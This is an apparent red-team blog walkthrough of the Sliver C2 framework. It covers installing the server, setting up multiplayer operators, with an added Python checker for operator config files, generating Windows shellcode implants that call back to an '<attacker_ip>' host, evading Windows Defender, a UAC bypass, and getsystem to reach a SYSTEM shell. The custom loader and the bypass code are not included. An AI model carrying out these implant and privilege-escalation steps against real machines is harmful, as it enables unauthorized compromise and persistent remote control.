
The road less travelled is for the curious and the courageous, and that is what drove this idea: getting a SYSTEM shell using Sliver C2. As defences have improved over time, attackers are increasingly adopting the Sliver C2 framework as an alternative attack tool. There are still not many resources available about Sliver, so we believe this walkthrough will help those who are starting out and want more guided steps. So, let's have some fun with Sliver!
Installation of Sliver Server and Client
In this example, we run the C2 server and client on Linux environments.
One-liner Linux install script:
curl https://sliver.sh/install|sudo bash
Then, run sliver to start the server console.
Sliver-Client (Operator):
Download the latest client binary from https://github.com/BishopFox/sliver/releases
Setting Up Multi-player Sliver
In larger red teaming engagements, multiple operators (players) can connect to the same Sliver server simultaneously and command the same Sliver army.
The easiest way to set up a server for multiplayer is to use the one-liner install script stated above, which will configure the server as a systemd service.
Connections between operators and the server are authenticated with mutual TLS (mTLS), and all of the certificates involved are generated and managed automatically by Sliver.
Generate a new operator configuration file using the sliver-server binary, which the install script places in /root by default:
./sliver-server operator --name numenplayer1 --lhost 192.168.81.135 --save numenplayer1.cfg

Next, copy the operator’s configuration (.cfg) file to the operator’s machine.
On the operator's machine, use the sliver-client binary to import the configuration file, then run sliver-client again to connect to the server.

Over at the Sliver server console, we will see the new operator has joined in.
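As an added example, not part of the original post or of the Sliver project, the following Python script sanity-checks an operator .cfg file before it is copied to the operator's machine and shows which of its fields are secrets. The field layout assumed here is the JSON that sliver-server operator --save writes (operator, token, lhost, lport, ca_certificate, private_key, certificate, with 31337 assumed as the default multiplayer port); the certificate and key bodies in the sample are constructed placeholders, not real key material.

```python
"""Sanity-check a Sliver operator config (.cfg) before handing it to an operator.

The .cfg is a credential bundle: it carries the operator's API token and the
private key of the mTLS client certificate. Assumed field layout (see lead-in).
"""
import json
import re
from typing import Dict, List

# Fields assumed to be written by `sliver-server operator --save`.
REQUIRED_KEYS = ("operator", "token", "lhost", "lport",
                 "ca_certificate", "private_key", "certificate")
PEM_KEYS = ("ca_certificate", "private_key", "certificate")
SECRET_KEYS = ("token", "private_key")   # never paste these into tickets or chat

# One PEM block: header, at least one body line, matching footer.
PEM_BLOCK = re.compile(r"-----BEGIN ([A-Z ]+)-----\n.+?\n-----END \1-----", re.S)

# Constructed sample config; names/addresses follow the walkthrough above,
# certificate and key bodies are placeholders, the token is a dummy string.
SAMPLE_CFG = json.dumps({
    "operator": "numenplayer1",
    "token": "0123456789abcdef" * 4,
    "lhost": "192.168.81.135",
    "lport": 31337,
    "ca_certificate": "-----BEGIN CERTIFICATE-----\nMIIB...constructed...\n-----END CERTIFICATE-----\n",
    "private_key": "-----BEGIN EC PRIVATE KEY-----\nMHcC...constructed...\n-----END EC PRIVATE KEY-----\n",
    "certificate": "-----BEGIN CERTIFICATE-----\nMIIB...constructed...\n-----END CERTIFICATE-----\n",
})


def load_operator_config(text: str) -> Dict:
    """Parse the JSON body of an operator .cfg file."""
    return json.loads(text)


def check_operator_config(cfg: Dict) -> List[str]:
    """Return a list of problems; an empty list means the config looks usable."""
    problems: List[str] = []
    for key in REQUIRED_KEYS:
        if key not in cfg or cfg[key] in ("", None):
            problems.append(f"missing or empty field: {key}")
    if problems:
        return problems  # no point checking contents of fields that are absent
    if not isinstance(cfg["lport"], int) or not 1 <= cfg["lport"] <= 65535:
        problems.append(f"lport out of range: {cfg['lport']!r}")
    if not re.fullmatch(r"[A-Za-z0-9.-]+", cfg["lhost"]):
        problems.append(f"lhost is not a plausible host: {cfg['lhost']!r}")
    for key in PEM_KEYS:
        m = PEM_BLOCK.fullmatch(cfg[key].strip())
        if not m:
            problems.append(f"{key} is not a single PEM block")
        elif key == "private_key" and "PRIVATE KEY" not in m.group(1):
            problems.append(f"{key} does not contain a private key")
        elif key != "private_key" and m.group(1) != "CERTIFICATE":
            problems.append(f"{key} does not contain a certificate")
    return problems


def endpoint(cfg: Dict) -> str:
    """The multiplayer endpoint the operator will connect to."""
    return f"{cfg['lhost']}:{cfg['lport']}"


def redact(cfg: Dict) -> Dict:
    """Copy of the config that is safe to share when troubleshooting a connection."""
    return {k: ("<redacted>" if k in SECRET_KEYS else v) for k, v in cfg.items()}


if __name__ == "__main__":
    cfg = load_operator_config(SAMPLE_CFG)
    issues = check_operator_config(cfg)
    print("endpoint:", endpoint(cfg))
    print("problems:", issues or "none")
    print("shareable view:", json.dumps(redact(cfg), indent=2)[:200], "...")
```

Because the file holds both the token and the mTLS client private key, move it over an encrypted channel only, and delete the transfer copy once sliver-client import has placed it under ~/.sliver-client/configs/ on the operator's machine.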

Generating Implants
Sliver implants support two modes of operation: "beacon mode," in which the implant checks in with the server at an interval, and "session mode," in which it holds a persistent, interactive connection. In this example, we generate a session-mode implant as shellcode. The shellcode binary will be saved into the specified directory.
generate --mtls <attacker_ip> --save /tmp --skip-symbols -f shellcode --os windows

Figure 4: Generating Implant in the form of Shellcode
To execute the shellcode without it being killed by Windows Defender, we created a payload written in Go that performs the following:
- Download the Sliver implant shellcode
- Inject and execute in memory
*We will share the code in the next article 🙂
Getting Shell and Interacting with Sessions
Before you can catch a shell, start an mTLS listener to support the callbacks.

Serve the shellcode over a simple Python HTTP file server so the payload can download it, then execute the custom Go payload on the compromised system. Now it's time for the thrill: we got a shell!

To interact with the callback session, we can run either of the following commands:
sessions -i <session_id>
use <session_id>


Before moving on to post-exploitation, we can run any .NET reconnaissance tooling of our choice in memory with Sliver's built-in execute-assembly command.
Run the getprivs command to confirm the privileges and integrity level of the account the session is running as.

Post-Exploitation: Getting Elevated and System Session
Our final objective is to open a SYSTEM shell. To get there, we first need an elevated (high-integrity) Sliver session, which is where bypassing User Account Control (UAC) comes into play.
We upload a UAC bypass binary to the compromised system; it is an in-house technique developed by a Numen researcher.

Next, run the Sliver implant through the UAC bypass to spawn a new, elevated Sliver session.

To verify that the new session is running in an elevated process, run getprivs again.

Now, run the getsystem command to spawn a new session running as NT AUTHORITY\SYSTEM. Voila!

Wrapping Up
In recent months, Sliver has emerged as a Cobalt Strike alternative for malicious C2; its built-in commands give threat actors a better chance of evading automated security detections.
In the coming weeks, we will be releasing an article on real-world red teaming engagement scenarios using Sliver C2, including the code used to bypass Defender.
Numen Cyber Labs is committed to facilitating the safe development of Web 3.0. We are dedicated to the security of the blockchain ecosystem, as well as operating systems & browser/mobile security. We regularly disseminate analyses on topics such as these, please stay tuned or visit our blog here for more!
This blog was originally published on our Medium Account.